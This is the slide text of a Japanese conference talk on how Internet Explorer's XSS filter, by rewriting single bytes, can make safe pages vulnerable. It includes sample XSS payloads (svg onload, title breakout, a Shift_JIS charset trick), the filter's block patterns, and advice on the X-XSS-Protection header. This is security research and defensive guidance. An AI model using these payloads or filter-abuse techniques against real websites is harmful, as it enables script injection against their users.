XSSフィルターを利用したXSS攻撃 by Masato Kinugawa

1. X-XSS-Nightmare: 1; mode=attack XSSフィルターを利用したXSS攻撃 (自重版) Masato Kinugawa

2. 自己紹介 Masato Kinugawa

3. 自己紹介 Masato Kinugawa x s

4. 自己紹介 Masato Kinugawa x s B

5. バグハンターの愉しみ自己紹介

6. 話すこと IEのXSSフィルターを使って ❶XSSする手法 ❷XSSフィルターをバイパスする手法

7. 話すこと IEのXSSフィルターを使って ❶XSSする手法 ❷XSSフィルターをバイパスする手法ごめんなさい、変更します！

8. 話すこと XSSフィルターがどういうものか XSSフィルターとどう付き合うべきか

9. XSSフィルター Internet Explorer 8から導入(2009) Chrome/Safariにも同様の機能 ➡今回はIEのフィルターを取り上げる

10. IEのXSSフィルター基本 http://example.com/?q=<img+src=x+onerror=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body> q param is: <img src=x onerror=alert(1)> </body> </html> リクエストの値とレスポンスから、危険と判断される条件にマッチすればページを書き換える遮断前

11. こんなふうに# http://example.com/?q=<img+src=x+onerror=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body> q param is: <img src=x #nerror=alert(1)> </body> </html> 遮断後リクエストの値とレスポンスから、危険と判断される条件にマッチすればページを書き換える

12. XSSフィルターの不正確さ条件にマッチすればユーザ入力の動的生成部と無関係の位置にある文字列でも書き換えてしまう http://example.com/?q=AAA&<meta+charset= <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> </head> <body> q param is: AAA </body> </html>

13. XSSフィルター導入後の世界ページの一部が書き換えられる可能性をすべてのサイトが突然持つことになった # # # 2008 2009

14. ちょっと変わるくらい # # # どうってことない？ ➡どこか1バイト変わることがどういうことか考えてみよう！

15. http://example.com/?q=AAA <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="AAA".replace(/</g,'<'); document.write(s); </script> </body> </html> 文字列リテラル内へユーザ入力を動的生成

16. http://example.com/?q="/</script <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s=""/</script".replace(/</g,'<'); document.write(s); </script> </body> </html> XSS対策もOK

17. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'<'); document.write(s); </script> </body> </html>

25. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'<'); document.write(s); </script> </body> </html> <svg/onload=alert(1)>

26. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <scr#pt> s="<svg/onload=alert(1)>".replace(/</g,'<'); document.write(s); </script> </body> </html>

29. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'<'); document.write(s); </script> </body> </html>

35. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'<'); document.write(s); </script> </body> </html> <svg/onload=alert(1)>

36. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'<'); document.write(s); </script> </body> </html> <svg/onload=alert(1)>

37. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>

38. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</ti#le> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>

42. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="さ";alert(1)//".replace(/</g,'<'); document.write(s); </script> </body> </html>

43. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="さ";alert(1)//".replace(/</g,'<'); document.write(s); </script> </body> </html>

44. UTF-8の解釈 "さ";alert(1)//" 0xE3 0x81 0x95 0x5C UTF-8 さ Shift_JIS 縺表

45. Shift_JISの解釈 "縺表";alert(1)//" 0xE3 0x81 0x95 0x5C UTF-8 さ Shift_JIS 縺表

46. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="縺表";alert(1)//".replace(/</g,'<'); document.write(s); </script> </body> </html>

47. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="縺表";alert(1)//".replace(/</g,'<'); document.write(s); </script> </body> </html>

48. つまり 1バイトの変更すらリスキー https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf Universal XSS via IE8s XSS Filters 実際過去には XSSフィルターの書き換えだってそう、慎重に行わないと逆に脆弱にもなる Eduardo Vela Nava & David Lindsay

49. 2015：今は大丈夫？実際の遮断規則がどれほどのものかみてみよう！ XSSのないありふれた構造のページが XSSに脆弱になる複数のパターンを発見大丈夫…ではなかった！これはさておきこの件は適切に修正された後、公開予定

50. 遮断規則特に文書化されていないブラウザにロードされるdllのバイナリに遮断文字列が正規表現で書かれているのが確認できる

51. <button value= <form> <textarea> <isindex> <input value= <option value= <embed src= <embed type= <iframe src= <frame src= <x:vmlframe src= <link href= <import implementation= <meta http-equiv= <meta charset= <a href <script src= <script xlink:href= <script href= <script> <applet> <object type= <object codetype= <object classid= <object code= <object data= <base href= <style>@i <style>:( <style>: <style>=( <style>=

54. <button va#ue= <fo#m> <texta#ea> <is#ndex> <input va#ue= <option va#ue= <em#ed src= <em#ed type= <if#ame src= <f#ame src= <x:vmlf#ame src= <li#k href= <im#ort implementation= <m#ta http-equiv= <m#ta charset= <a hr#f <script src= <script xlink:href= <script href= <script> <ap#let> <ob#ect type= <ob#ect codetype= <ob#ect classid= <ob#ect code= <ob#ect data= <ba#e href= <style>@i <style>:( <style>: <style>=( <style>= 遮断後

55. <button va#ue= <fo#m> <texta#ea> <is#ndex> <input va#ue= <option va#ue= <em#ed src= <em#ed type= <if#ame src= <f#ame src= <x:vmlf#ame src= <li#k href= <im#ort implementation= <m#ta http-equiv= <m#ta charset= <a hr#f <script src= <script xlink:href= <script href= <script> <ap#let> <ob#ect type= <ob#ect codetype= <ob#ect classid= <ob#ect code= <ob#ect data= <ba#e href= <style>@i <style>:( <style>: <style>=( <style>= 遮断後

57. <a hr#f <m#ta charset= <li#k href= <script> DEMO❶ ❷ ❸ ❹

58. 感じてほしいこと自サイトがどうなるかはフィルター次第 ➡そんなのブラウザのバグ？ブラウザがなんとかしてくれよ？常に安全にページを書き換えることができているとは言えない

59. そもそもあなたのページはどこか一部分が壊れても耐え得る作りになっていると断言できる？

60. フィルターがやれること最大限に配慮しながらページを書き換える #

61. 実のところ意図的に誤検知を生じさせて、特定の機能を動作させないようにすることも、場合によっては可能です。(略) XSSフィルタの作者が、この種の危険性を認識しつつもXSSフィルタを導入したのか（あるいはそうではないのか）、ちょっと興味があります。ブラウザ側も危険性を認識した上で導入以下は6年前の寺田さんとはせがわさんのやりとり T.Teradaの日記より http://d.hatena.ne.jp/teracc/2 0090622

62. 実のところブラウザ側も危険性を認識した上で導入以下は6年前の寺田さんとはせがわさんのやりとり http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke 中の人は "The answer is Yes. " だそうです。はせがわさんのはてなブックマークのコメントより ➡Web開発者が危険の面倒をみながら使えばいい？

63. 面倒をみるとは ✔ XSSフィルターの遮断動作を全て把握 ✔ 部分的に書き換わっても安全に動作することを全てのページで検証 ✔ 危険な部分は逐一コードを書き直して回避つまり次を行うこと：できそうですか？

64. 遮断文字列の一例 javascript:1 vbscript:1 vbs:1

65. 遮断文字列の一例 javasc#ipt:1 v#script:1 v#s:1 シンプル？

66. javascript:リンクの遮断の詳細 {(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|( 41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;) |(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&( ([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[ ].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73) );?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))) )*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|( 52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab; )|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(& (([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[ ].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10 )|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7 4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;) )))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).}

67. javascript:リンクの遮断の詳細 {(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|( 41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;) |(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&( ([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[ ].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73) );?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))) )*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|( 52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab; )|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(& (([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[ ].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10 )|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7 4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;) )))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).} http://masatokinugawa.l0.cm/2012/09/xss3.html

68. これができるなら ✔ XSSフィルターの遮断動作を全て把握 ✔ 部分的に書き換わっても安全に動作することを全てのページで検証 ✔ 危険な部分は逐一コードを書き直して回避自分のサイトのXSS全部潰せるのでは… ➡じゃあどうするのがいいか？

69. X-XSS-Protectionヘッダ値効果 0 無効 1 有効 (部分的書き換え) 1;mode=block 有効 (表示の完全な停止) デフォルト XSS保護機能を制御できるレスポンスヘッダ

70. Y 慎重な彼らはどうしている？

71. HTTP/2.0 200 OK Date: Mon, 19 Oct 2015 22:32:06 GMT Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN ...

72. HTTP/1.1 200 OK Content-Encoding: gzip Content-Type: text/html Date: Mon, 19 Oct 2015 22:40:37 GMT x-content-type-options: nosniff X-Frame-Options: DENY X-XSS-Protection: 0 ...

73. ちゃっかり制御している！！

74. より安全を考えた選択値選択すべきサイト 0 基本的なXSSは対応している /誤検知をなくしたい 1 推奨しない (発見した手法の影響を受けるのもココ) 1;mode =block XSSがまだありそう /念のため保護も受けたい default X-XSS-Protection:0 か 1;mode=block

75. mode=blockなら安全？直接スクリプト実行に繋がることはないはずフィルターの恩恵の方が大きいと僕は考える遮断時の特徴を外から検出できればページ内容を推測できる可能性はありうるこの可能性はゼロにはできないだろう一方で

76. Web開発者の声僕開 1;mode=blockに変更したらどうだろう？

77. Web開発者の声僕開 1;mode=blockに変更したらどうだろう？遮断時の説明が不親切で、誤検知時のユーザ対応を考えると厳しい…。

78. 遮断時の説明が不親切確かに…

79. Web開発者の声基本的なXSS対策はできていると思うし、 X-XSS-Protection:0にしては？僕開

80. Web開発者の声基本的なXSS対策はできていると思うし、 X-XSS-Protection:0にしては？僕製品動作を優先して不適切にセキュリティ機能を切っていると思われる可能性が。開

81. XSSフィルターの罠攻撃箇所だけ遮断して残りは表示してくれるのが一番スマートにみえてしまう 0 1 block この動作がリスクそのもの

82. さいごにまだ安全側に倒す余地はあるはずデフォルト動作が今のままで本当にいいのか遮断の原理上、リスクはつきもの Web開発者はその可能性を知ってほしいデフォルト動作以外で制御することを強く推奨 XSSフィルターの改善には期待したい

83. http://l0.cm/xxn/ 本当のNightmareは以下で後日公開エルゼロ

84. ";alert#"Thanks!"#// @kinugawamasato masatokinugawa@gmail#com

XSSフィルターを利用したXSS攻撃 by Masato Kinugawa

CODE BLUE

XSSフィルターを利用したXSS攻撃 by Masato Kinugawa